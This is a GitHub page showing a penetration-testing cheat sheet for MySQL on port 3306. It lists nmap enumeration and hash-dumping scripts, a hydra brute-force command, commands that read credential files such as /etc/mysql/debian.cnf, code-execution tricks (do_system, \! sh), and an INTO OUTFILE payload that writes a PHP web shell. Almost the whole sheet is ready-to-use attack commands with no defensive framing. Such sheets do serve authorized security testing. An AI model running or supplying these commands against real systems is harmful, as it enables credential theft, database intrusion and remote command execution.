forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
3306
37 lines (28 loc) · 892 Bytes
/
3306
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# MYSQL - 3306
# Enumeration
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
# Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
# Extracting MySQL credentials from files
cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
# Connect
# Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
MySQL commands
show databases;
use <DATABASES>;
show tables;
describe <TABLE>;
select * from <TABLE>;
# Try to execute code
select do_system('id');
\! sh
# Read & Write
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'
# Manual exploit
https://www.asafety.fr/mysql-injection-cheat-sheet/